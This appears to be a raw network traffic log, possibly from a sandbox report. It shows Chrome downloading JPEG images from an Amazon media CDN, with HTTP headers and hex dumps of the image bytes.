                                                                                                                                                                                          2024-12-15 11:38:01 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 28953
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 403f66df-866b-46b3-95bd-aca3ed9a5e25
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 13 Jul 2016 19:43:40 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 06 Nov 2044 15:34:31 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:01 GMT
                                                                                                                                                                                          Age: 1625173
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000105-IAD, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c4 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 05 06 07 08 04 03 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 02 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d8 a1 49 69 68 5a 40 98 df 29 f0 9d 49
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5IihZ@)I
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 18 7c cb 8a ca 22 f2 b7 42 3c 89 07 6b d4 f7 cc eb 1b ba d8 de a1 7b 1d 0c ef 69 0f 21 c6 9b 1d 1b a6 28 b6 b3 b7 71 7b f5 73 68 56 e8 8e 9c e5 eb 98 d1 f7 53 76 a3 5c 49 a6 12 24 eb 1c eb b9 d8 77 8c 0b 6a cb e5 12 be 1e 44 a1 9f b3 8e e3 dd 78 c3 68 69 00 05 64 9f 3f 44 a1 60 06 11 91 87 cc 88 c4 96 35 2b 00 00 84 9a 32 13 d8 b6 46 03 b4 f9 ba 74 ca 28 c9 54 e9 64 44 5e 65 4d 65 6a 93 b3 83 a7 97 a8 b9 fc 19 74 ca 98 e5 9c 9d d6 fc 9a 17 37 bf 1f 43 b7 a2 eb 13 40 5b 22 d0 bb 03 1c 46 b4 9b b3 47 45 56 91 d8 b9 0f 5e 00 00 5f 9d 24 64 85 00 18 46 00 7c c5 8d c8 a3 b2 a8 22 02 33 2b 71 38 f5 ff 00 3b 5f 2f 5f 83 cc 32 2f 8d dc 3c fc 6b 78 8e 64 4d c7 9c b7 8a 24 8a 4b d1 0b 7f 93 96 65 c7 df 3f b2 3c e5 9d 3c 5c 6e 28 2a 4b c7 a7 db 99 99 53 34 6b 29 df
                                                                                                                                                                                          Data Ascii: |"B<k{i!(q{shVSv\I$wjDxhid?D`5+2Ft(TdD^eMejt7C@["FGEV^_$dF|"3+q8;_/_2/<kxdM$Ke?<<\n(*KS4k)
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 0c 25 21 48 4e 68 d2 e9 cf 47 ce ff 00 7d 90 ef c9 ee 34 d8 00 76 fc f0 00 3c 1a 92 a0 32 32 05 91 80 24 2d 21 e4 00 05 a5 49 01 e9 e7 e8 00 00 0a 00 01 80 01 1e 9e 7e 80 00 00 80 09 1c 1e a0 33 c7 d8 04 25 00 30 00 00 fd 40 0f 70 00 05 00 06 40 21 40 06 02 00 3c 48 04 7a 20 00 35 00 01 40 30 c0 08 50 00 11 e8 00 10 00 3c c8 00 ff c4 00 35 10 00 02 01 03 03 02 04 05 04 02 02 01 05 00 00 00 01 02 03 00 04 11 05 12 13 14 21 10 22 30 31 20 23 32 33 34 06 15 35 41 24 40 25 42 51 43 50 52 53 61 ff da 00 08 01 01 00 01 08 02 f8 6e 66 10 46 d2 18 a7 de cc 9e 2b 2e e7 74 1f 15 c5 f2 41 9f 1d c3 3b 6a 29 96 61 95 f8 67 bb 8a df 1c 91 4a b2 8d c9 56 f7 6b 70 5c 2f ab 7f 01 9a 58 d6 a3 13 5a 8c ac b3 df 82 48 8a f6 69 7c c2 29 e7 51 38 27 51 98 77 ab 19 9a 75 de 7e
                                                                                                                                                                                          Data Ascii: %!HNhG}4v<22$-!I~3%0@p@!@<Hz 5@0P<5!"01 #2345A$@%BQCPRSanfF+.tA;j)agJVkp\/XZHi|)Q8'Qwu~
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 61 72 d8 70 6a 29 77 aa 51 3b cd 48 32 45 05 db 57 84 ef 35 6a db 5c 54 e2 46 38 a5 d2 a2 65 df 53 45 c3 f4 67 3e e5 3b 64 47 1e f3 5a 37 e6 ae 3d 1b ef bf 3f 82 44 5a ad ad 18 54 7e 41 5d 57 14 b9 61 b7 de 9e 5c 9c 08 6d 31 dd b5 2c 6f ed 62 c2 44 22 ac a3 68 f9 37 df c4 06 d6 a3 84 b6 22 ac 9f 92 25 ab 91 e6 ab 0c 30 15 e4 5d c0 f1 76 c8 24 ff 00 db 50 04 3f 78 97 24 54 30 87 40 1f 53 93 8f e5 ad cc 4b 20 dc a5 77 0d d5 61 18 92 55 06 fc af b0 d0 7f 2d 3d 2b ff 00 c8 9e 95 09 a8 62 35 c4 55 69 e3 53 8d e9 02 23 55 f5 e6 1b 68 46 04 0d b7 37 22 21 57 32 ab 56 9e fb 6a 46 f2 9c 5c 37 24 28 6a 78 4c 9b 30 8e 11 6a 79 37 35 46 1a 4c 2a cc d2 c5 c6 5e 59 c4 a1 5a 34 98 1e d5 a9 42 18 6f 09 8c d4 12 f9 3b 5c 9d c3 35 77 70 e4 a1 30 c9 e5 95 56 da 1e 8d 37 b5
                                                                                                                                                                                          Data Ascii: arpj)wQ;H2EW5j\TF8eSEg>;dGZ7=?DZT~A]Wa\m1,obD"h7"%0]v$P?x$T0@SK waU-=+b5UiS#UhF7"!W2VjF\7$(jxL0jy75FL*^YZ4Bo;\5wp0V7
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: a8 8e ba 60 e2 32 b7 9d e7 9b 19 c7 61 a1 26 27 53 e9 5e fd f9 be 1b 5b 8e 07 dd 56 97 a2 63 8a 3e 19 f0 96 47 70 56 2f dc d9 53 0a 4e 4e 69 97 d8 50 ec c2 a5 8c f1 ef ab 0f fb 3d 45 1a 49 89 43 43 b8 54 32 6f 1f 04 f0 72 90 68 ff 00 83 6f 23 36 6a 24 cd 68 cd 9b 85 c7 a3 79 f7 a6 f8 a3 62 a7 b4 5a 8c e2 85 fc af ed 17 51 25 08 3f f9 28 18 c0 70 d1 33 a9 c5 0e de 0e db d6 34 ab 69 4f 99 10 5f b4 03 e6 47 7b 1c 9e d8 1e fe 19 f0 ca fd 47 58 d4 85 c9 d9 1d 6e fe ab 42 4d ae 3d 2b cf bd 37 c5 67 67 24 fd d6 2d 30 8f a9 6d 95 7c 31 5b 2a ea d5 2e 06 24 9e 06 b7 72 8d e1 6c 41 84 35 41 6e e3 26 3b 7b 64 7f b8 b6 50 7b 84 5d 9d bc 31 42 b5 90 d7 52 6c 49 23 68 ce 1a 85 68 c9 f3 55 bd 2b cf bd 37 c3 61 a6 f2 e1 e4 e4 54 00 01 38 35 25 d0 14 b7 db 8d 2b e6 b9 40
                                                                                                                                                                                          Data Ascii: `2a&'S^[Vc>GpV/SNNiP=EICCT2orho#6j$hybZQ%?(p34iO_G{GXnBM=+7gg$-0m|1[*.$rlA5An&;{dP{]1BRlI#hhU+7aT85%+@
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: d9 02 5b 6c d3 a1 1c 93 6b 8c 7e dd b5 e2 5c 02 ca 9a b3 c9 38 0b a8 ea 46 53 b2 3d 09 9b 32 0a bf d5 f6 65 22 96 69 5b b3 e9 8c 2d ed 83 49 3e bb ff 00 d7 61 aa f3 36 d9 3d 19 2d b0 ee 6a dd 3b d6 a3 60 81 37 30 14 06 6a 4b 77 88 65 ed a4 29 22 11 1c 7b 3e 15 75 7c ed d7 a4 fb 69 56 37 29 6c fb d8 5f 2c d0 49 22 ab 6d c1 ab 38 85 b2 75 32 a2 4b 7f 2d 4b 1e d7 28 97 ee 2d 61 4b 65 ab 88 c4 58 4a 76 e8 ad 95 06 95 67 bf 33 34 56 ed 31 32 cb 2c b2 5f 48 00 bc 81 2d 40 8e b4 6b 2c 0e 66 f4 6f e4 e9 b0 4d 83 15 56 32 dd dd 1b 97 cd 5b 5a b5 cb 6d 5b 4b 04 b6 1e 5b eb 93 3c 86 b4 d8 b9 67 4f 81 98 28 c9 bf d5 1a 7f 2a 59 34 9c 88 89 ad 3e 67 c5 3a 14 c6 eb 77 c5 bd cd 69 10 2c d2 9d da c4 db e5 d9 59 1a 6d b5 59 3a c7 27 23 9c ca 25 99 f4 f8 fb b4 ad 6b 89 25
                                                                                                                                                                                          Data Ascii: [lk~\8FS=2e"i[-I>a6=-j;`70jKwe)"{>u|iV7)l_,I"m8u2K-K(-aKeXJvg34V12,_H-@k,foMV2[Zm[K[<gO(*Y4>g:wi,YmY:'#%k%
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: ba 29 b2 ca 49 e7 46 5e 14 a6 24 9b a6 82 24 0a 08 c1 eb c6 49 69 a8 77 4e 46 c5 97 92 fa e6 c7 d0 64 38 24 27 82 8c b5 6b 18 dd ec ca bf de 2c ac 33 60 68 e2 90 6c 84 e5 68 af af 17 2b b7 d8 32 03 79 1b db f1 23 ea 2f 36 38 27 61 81 83 2e c2 40 57 ec 21 4a 5b c9 3f 63 f0 31 0d 62 b9 38 3c 64 a2 d8 75 ac 44 3e c0 95 78 05 94 66 a0 64 5c 92 31 de ed 40 73 40 02 cb fd f7 a3 19 1c aa d7 54 30 c2 09 b0 84 91 cf 83 44 1b 04 43 d1 20 ac 64 9d 68 0f 82 d6 39 88 0b 27 28 0c 26 c5 62 85 fd 59 91 7d 88 1c 59 5c 69 02 fc 2f 96 a3 25 fd 73 7b ab ac 38 91 b5 f1 7c 1c 41 c6 3a 55 62 f4 c4 fb fe 36 87 65 33 bc 8d 59 b6 44 fb 02 7c ca d8 a2 61 2b ea ce 05 27 02 81 ea b0 5f a0 ab 19 14 c1 08 18 46 08 43 31 6c 60 6a 84 15 a9 af 22 e1 45 96 75 63 ce e0 7a d9 6b 23 93 9d 70
                                                                                                                                                                                          Data Ascii: )IF^$$IiwNFd8$'k,3`hlh+2y#/68'a.@W!J[?c1b8<duD>xfd\1@s@T0DC dh9'(&bY}Y\i/%s{8|A:Ub6e3YD|a+'_FC1l`j"Euczk#p
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 0e 6b 3e 6a e5 48 20 a7 ac e3 57 fc 4b 36 17 01 10 b1 c5 6a ac a4 0f 91 52 0e 0f f4 1b be d8 94 9b 95 8d 80 56 60 72 47 d8 00 b1 14 65 71 f9 98 0f 0c 62 80 6a c4 b4 41 08 21 e3 56 1b 0e 8f d3 94 2b dd c9 63 6a 2e af 24 b8 92 5e a2 e6 c2 6b 83 f6 56 12 45 22 8c fa b6 03 f1 68 8b 05 dd 25 06 a6 5f 55 0c 93 81 74 ff 00 47 d3 34 a8 e1 68 3a 60 54 ea 92 88 c4 36 69 9f 98 19 20 54 f6 bd 97 d7 c5 4a aa d5 9f 49 7b 9c ba 2f 44 b4 42 16 4e a3 6f f4 8c 14 09 48 39 0d 21 6a b0 b5 32 5e 44 87 ac ac f2 49 1a 89 d1 20 ec b9 8b a3 5b 19 58 dd 59 f4 18 24 49 66 33 59 c2 2c d2 d6 0b 75 b3 b5 67 89 57 a4 5b fd 46 6e ba 80 b7 17 2c b6 fe 16 9f e5 6b 68 b7 bd 4e 3e 9f 02 c3 07 48 b6 92 56 7b c9 fa b5 e8 9a ec aa cf d2 25 b7 8a 29 9a c3 a6 c5 04 49 77 71 c3 f5 42 42 5f fd 65
                                                                                                                                                                                          Data Ascii: k>jH WK6jRV`rGeqbjA!V+cj.$^kVE"h%_UtG4h:`T6i TJI{/DBNoH9!j2^DI [XY$If3Y,ugW[Fn,khN>HV{%)IwqBB_e
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 8a 2a 7c 30 44 c4 79 a1 0e b5 57 f9 5b 43 30 53 bc e6 9a 79 8a 58 10 58 3b 65 be eb 42 05 5c a9 ca ca 45 63 67 5b 21 9b ce 68 8a 5f 61 80 15 28 8e 04 2e ba 04 b5 9f 86 71 e6 9e 7c 11 77 51 0b 0a f1 5f 8b 65 be eb 4a 28 82 2f b7 c3 ea ab 6d ea fa 2b ac 14 55 8d ed 82 11 e6 85 85 4d 13 aa bb 50 5e 1c 97 df 34 60 b0 76 cb 7d da 1e 37 21 44 21 9a 6a a9 64 ce 36 dc 54 c3 45 10 80 1c 21 67 d1 3f 3b ef 14 5d c6 17 23 3c 2f 57 56 d9 46 a6 04 a8 4b bc 28 55 f4 5d a7 0f 04 16 0e d9 6f ba cf d1 1d 59 ab de 60 8e b4 26 b5 85 8d f1 b0 c0 0b 26 09 ea 11 b2 3d 6c b9 05 2f 2d 03 25 41 65 f6 60 ed 96 fb 91 e9 78 51 50 3e aa 81 76 47 9a 31 89 94 3b a8 e8 89 de 87 5b d7 1d 0d 63 e4 9a d2 30 4d 32 fc 52 4d 89 e6 9c 3f a4 49 53 35 53 82 94 8f 45 5a 70 b3 07 6c 84 62 f7 26 19
                                                                                                                                                                                          Data Ascii: *|0DyW[C0SyXX;eB\Ecg[!h_a(.q|wQ_eJ(/m+UMP^4`v}7!D!jd6TE!g?;]#</WVFK(U]oY`&&=l/-%Ae`xQP>vG1;[c0M2RM?IS5SEZplb&
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 65 dd 1e aa ae a7 a0 54 64 f6 3d a8 49 4c ff 00 c8 ef a6 cb 7d de b6 95 2e 2a 5c 6f 55 9f e6 0a 3a 5d e9 2b d5 c1 77 9c a9 93 f5 46 66 a9 b0 e6 a8 31 5d 82 51 d5 1e 6a 90 0b ab 93 8f 22 8c 02 6f 53 f4 50 11 a4 36 58 9b 24 6d 10 8a c4 69 18 c1 71 42 26 e5 70 3d 2c fc 8d 53 38 dc 14 e7 0e 6b f3 7d f1 b2 a3 b5 f4 e8 bb 79 5a f0 42 4c a0 c4 a8 86 4c 93 ec bf 2b 70 53 7d e7 0e 4a fa 6c 84 8d f8 21 26 cf e2 62 a9 70 5e 38 2a ef 5e a8 0c 95 d3 f0 d1 93 7c ca 74 22 42 b8 04 21 15 f8 10 88 01 77 17 6d ff 00 7e 4b ba 3c 4a fb 27 e8 15 32 42 3d 6e 46 55 2b a2 96 aa ec 8f 35 3c a3 ff 00 c4 2b ea 54 cc 7a 0d 9d d5 55 2b a9 c5 76 9d 4b 3b d4 b1 dd 93 21 72 bd 75 5f 94 7b ae e0 f5 58 ff 00 a5 88 57 bd be 53 54 00 2d e8 af d1 5e ae 99 e6 55 5c 41 2b f4 54 84 b8 a2 5d c1
                                                                                                                                                                                          Data Ascii: eTd=IL}.*\oU:]+wFf1]Qj"oSP6X$miqB&p=,S8k}yZBLL+pS}Jl!&bp^8*^|t"B!wm~K<J'2B=nFU+5<+TzU+vK;!ru_{XWST-^U\A+T]


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          55192.168.2.1649784151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC445OUTGET /images/M/MV5BNzljYzQyNTMtNTdmZC00ZTM2LWJjN2YtMDNiOGI4Nzg1NThkXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:01 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 37034
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 9235bdea-c5a3-4b96-a069-7214cc190cf1
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 14 Feb 2018 19:28:20 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 08 Oct 2044 21:22:28 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:01 GMT
                                                                                                                                                                                          Age: 3627626
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000121-IAD, cache-ewr-kewr1740047-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bf 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 00 02 03 01 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b8 db ed 8a 67 9e e0 79 99 ee 99 e7 b8
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5gy
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 7d c0 79 29 7c 70 65 1f 42 6d 9f e1 7b 2b bc 5d 52 aa 4f bc ea 33 1b b4 8d 28 0f d1 3f 9d 1b ab fa a3 5d 9d 2b 96 37 af 4a eb bf 42 05 6c 93 62 f3 08 d8 1a 34 95 63 7e ae 15 c7 50 c9 38 d6 d6 ac d8 4a cf 3b 31 77 2b 93 2f cc 14 50 22 7d 1a 43 ec cd e9 ba 39 bb 69 a2 bc 13 f7 31 7d 4a c6 fb cf 44 c9 4a b4 9e c6 41 0f 1e 24 e1 6e 0d 96 72 dc d1 ab c2 83 aa 35 89 c9 28 4a ab 34 60 f9 95 f4 db e6 0e 9e 38 35 2f ce 87 15 ad eb 52 cb 1e 99 d6 25 0e f3 67 28 5c 7c 3c cb bd 61 18 c8 11 d3 af 44 0a 07 19 0d 55 89 a4 00 e2 18 f5 84 46 12 d4 13 6e 61 4d 31 fe 9c 7a 9a e3 82 75 3d bf 8f 93 73 f5 13 90 8c 98 e0 e4 2d 25 f4 68 50 76 ab c7 50 ed 22 df a0 3f 30 7e 9b bf 33 8f 1e c9 31 55 f9 eb 08 0f 7c d9 fa 19 f3 cf 4e 6f 2c 8f f9 75 0a 12 2e 5b 2c 71 68 e8 8e 79 c9 8b
                                                                                                                                                                                          Data Ascii: }y)|peBm{+]RO3(?]+7JBlb4c~P8J;1w+/P"}C9i1}JDJA$nr5(J4`85/R%g(\|<aDUFnaM1zu=s-%hPvP"?0~31U|No,u.[,qhy
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 08 c3 64 a8 d9 fd 16 22 85 a3 f4 ee 68 7a a0 30 e8 b9 56 a2 e7 56 b7 d9 74 67 bb 72 c3 a2 15 c9 b1 92 b7 3f 32 ee 2e 74 08 2f 31 ef 97 0e 1c f7 19 bc 15 22 dc fb 3f 3d 9e 7b 94 e4 cf 9e bf 42 90 69 f3 1c af e8 52 30 a5 24 56 fd 40 52 9f 6e 8a 80 a0 41 1f 48 59 c2 8f 86 fd 2a 8f 07 a6 6e f6 ca 53 c6 a3 a7 b6 1d ba 1d 30 a2 29 dd f6 74 86 94 4e 68 5a 70 b8 35 93 f3 1a a7 ab b4 89 9f 2b 9b 7d 8c 63 57 86 9a ec a2 f6 5a da 49 30 97 b4 e9 c9 d1 d9 3e e5 7b 11 bb 89 55 e9 9d de d1 65 39 f3 5d b1 a3 99 99 a6 66 60 66 66 06 66 60 66 66 06 66 60 66 66 06 66 60 66 66 06 66 60 66 66 06 66 60 66 66 06 66 60 66 66 06 66 60 66 66 06 66 22 05 b8 9b be 1f ff c4 00 33 10 00 02 02 02 01 04 01 02 05 03 03 04 03 00 00 00 01 02 00 03 04 11 12 05 10 13 21 31 14 22 20 23 32 33
                                                                                                                                                                                          Data Ascii: d"hz0VVtgr?2.t/1"?={BiR0$V@RnAHY*nS0)tNhZp5+}cWZI0>{Ue9]f`fff`fff`fff`fff`fff`fff`fff`fff"3!1" #23
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 69 5e 47 8b d8 6e a0 cd 0d dc a2 b7 f8 0c 44 f8 98 99 0a 8b c4 db 91 47 1d 37 9e ab 2a 08 cd 92 be 1e 03 13 39 50 71 7f aa a9 37 2a cd 4e 27 96 1e 52 53 5f 17 ae bf ca 45 39 54 f3 af 44 e4 d3 75 7c 4b e4 a7 87 84 5c aa fc 3c 25 de 00 07 89 8c e5 08 9f 13 f9 98 04 2d 79 2c df dd 15 2b c7 32 b7 5b 00 65 b7 e7 be 5e 2b 1b 8d c6 96 e2 52 73 e2 df 6d 79 9f 13 3a ea af ab 47 ff 00 1d 80 9a 9a 83 d4 e7 01 df 66 c5 b5 3e 41 8c 60 5d 82 d3 c6 78 f2 9c 1b 5c a7 03 a2 dd da b6 4f d5 b9 f3 3e 3b 19 cb 70 88 93 a5 70 16 3a df 8d 85 51 a2 85 88 82 b1 a5 b7 e6 0e d6 ed 7e a4 44 3f 1a 3e e6 c8 9a dc b2 7b 63 ef 5d b5 2d 1f c0 e2 60 3c 7e 68 0f 71 e2 bf 5c d4 15 05 fa bf 95 6c 59 4e 7f 89 16 b3 fd d7 ee e5 07 54 60 ba 38 f9 e6 aa 5a 90 f9 f6 8d e4 1f ab 6f 03 b3 65 e6 7d
                                                                                                                                                                                          Data Ascii: i^GnDG7*9Pq7*N'RS_E9TDu|K\<%-y,+2[e^+Rsmy:Gf>A`]x\O>;pp:Q~D?>{c]-`<~hq\lYNT`8Zoe}
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: f1 90 8b 67 25 3a 62 ff 00 87 53 5d d2 06 f5 b9 d1 72 92 ab 1b 92 5c 8e 74 23 76 c9 bb c5 5b b2 d9 9f aa 7c 83 2a e1 6b 92 04 10 41 da 9a 83 83 0a 6a 54 d3 ab 0f 48 63 3f e4 22 4e 07 45 a5 08 d5 b6 e2 31 70 19 ee 06 eb 5b 58 b8 9e 4e 40 8e 8d af d7 fe 93 20 11 d4 0a b9 57 04 f7 54 2d 2b c5 ff 00 2b 88 25 78 6b 3e 89 0c b7 a5 6c 7d b6 d4 6b 3a 68 0c e8 97 d7 55 e0 bd 3a e5 68 ec fd af e6 10 f8 f1 3c 9e 3d 5d 9f 8d f4 b7 3d 72 bf 8e c2 0e d4 37 16 8f 5c 51 a9 d4 17 95 51 31 bc a3 18 42 c1 d8 b4 c1 5f b0 17 ca 6d 10 83 03 ee 60 c4 52 55 db 89 b1 dd 7d 64 50 08 79 96 c5 bd 1e c9 54 44 8b 14 7b 10 45 1b 81 66 5e 18 b8 7b bf 15 b1 cf b6 9d 1b ef be a0 2a e0 39 f1 8f de fc aa b1 f5 e4 cd b3 cb 75 af 2a f8 ec 20 8a 37 38 fb 9e 6b 17 e1 1f 94 ca f7 5b 4c 1d f1 5d
                                                                                                                                                                                          Data Ascii: g%:bS]r\t#v[|*kAjTHc?"NE1p[XN@ WT-++%xk>l}k:hU:h<=]=r7\QQ1B_m`RU}dPyTD{Ef^{*9u* 78k[L]
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 7a af b6 c4 5e 1c b5 5f c0 ec fd ba a7 4c f3 fd e3 2f 0a dc 36 e1 6f e1 bf d5 6a 3b 53 47 16 05 dd 8d 84 b3 51 fa 52 61 7e dc 0c 55 9e 52 5a a5 3c 95 ca fa 8a a0 58 ba ea 3f b6 25 37 68 ea 63 3f a9 f2 23 2f 2d 83 93 49 c7 72 90 34 0f 12 c9 5d d3 ea 23 64 46 b2 27 dc 62 2f b9 5a ca 84 1d 9a 5d cf 8f e5 dd 9b 7d 98 57 bb 75 8a cd a9 4e 5b 7e 0a 53 99 f7 46 2d 99 f6 4c cc 6c 6c 25 f1 25 3d 39 54 7d ed 83 59 95 7a 02 55 57 88 6a 52 fc ee 62 10 6f ce 27 fb c4 c7 ad ab b7 de 60 da ae f2 50 23 7d b8 b4 14 1f 72 bf f1 db a9 e3 79 97 d4 dc 16 45 ba 2d a4 c4 24 c4 5d ca 57 80 dc a3 dc 51 10 fc c0 77 d8 f6 ea 76 fd 35 0e 47 5a 26 cf a6 b8 fe 02 78 52 04 c2 43 55 3f 97 5f 23 70 dc c3 f7 4d 73 82 16 26 38 af e1 c3 54 96 8d 2d 8b c6 f9 e5 4e 7b 98 b4 85 b6 67 af 1a f9
                                                                                                                                                                                          Data Ascii: z^_L/6oj;SGQRa~URZ<X?%7hc?#/-Ir4]#dF'b/Z]}WuN[~SF-Lll%%=9T}YzUWjRbo'`P#}ryE-$]WQwv5GZ&xRCU?_#pMs&8T-N{g
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 3f 16 53 e4 1a 3f 4b c8 7d ff 00 4d b1 ee ca ee fb 0a 65 62 9b d1 d4 fd 23 f1 d9 3d 3d eb 20 d5 f4 2d 71 aa cb 8d 37 0a cf 1c 4a 1e 97 61 2f e6 10 f8 ee af 25 74 ea 96 5f e7 28 d7 55 c8 6c 57 8e 17 d9 ae a5 ac 69 7f fc 61 a5 7e 60 5d 76 ff c4 00 2a 11 00 02 02 01 03 04 01 04 03 00 03 00 00 00 00 00 01 02 00 11 03 10 12 21 04 05 13 31 14 15 20 22 41 23 32 33 24 30 51 ff da 00 08 01 02 01 01 08 00 ff 00 b2 be e3 2e 6c e6 a6 de 65 18 10 7e bc 57 c4 38 6a 0c 27 f6 70 91 05 13 06 21 ea 78 6e 0c 06 7c 73 3c 07 8b 18 0f b8 f8 ab 98 c8 2a c3 68 af 73 2e 5d 82 c1 ea 4b 88 ae c0 f3 8b a8 dd c1 d0 64 53 37 a4 de be e1 ca 9f bf 22 01 c6 f5 6e 20 51 50 aa 9f 7b 07 a9 95 00 a8 d5 c5 45 6e 0c 7c c5 89 83 83 0f ab 8b 97 69 04 63 ca 18 58 b9 d5 e5 ce 9e 2f 00 fa 8f ec 0e
                                                                                                                                                                                          Data Ascii: ?S?K}Meb#== -q7Ja/%t_(UlWia~`]v*!1 "A#23$0Q.le~W8j'p!xn|s<*hs.]KdS7"n QP{En|icX/
